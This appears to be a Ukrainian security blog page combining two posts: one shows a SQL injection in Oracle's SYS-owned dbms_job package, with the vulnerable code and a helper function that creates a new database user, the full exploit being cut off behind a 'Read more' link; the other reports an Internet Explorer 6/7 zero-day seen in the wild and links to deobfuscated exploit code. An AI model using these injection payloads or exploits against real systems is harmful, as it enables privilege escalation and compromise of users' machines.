Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...

INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо  комусь і буде потрібно. Але щоб довести справу до переможного кінця,  знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.

...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...

Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

Ну і власне сам експлойт (під катом):
Read more...

Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп’ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com.
Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах:
– Microsoft Internet Explorer 7, Windows Vista SP2
– Microsoft Internet Explorer 7, Windows XP SP3
– Microsoft Internet Explorer 6, Windows XP SP3

Подивитись вихідний код експлойту.

Експлойт запропонований Moshe Ben Abu (деобфускований та з видаленою malware начинкою):
У звязку з тим, що ESET NOD32 через код сплойту сповіщає що наш блог містить потенційно небезпечний контент – даємо лінк на код експлойту:

http://uasc.org.ua/files/ie6-7exploit.txt

Відео роботи експлойта:

Internet Explorer 0-day Attack from Panda Security on Vimeo.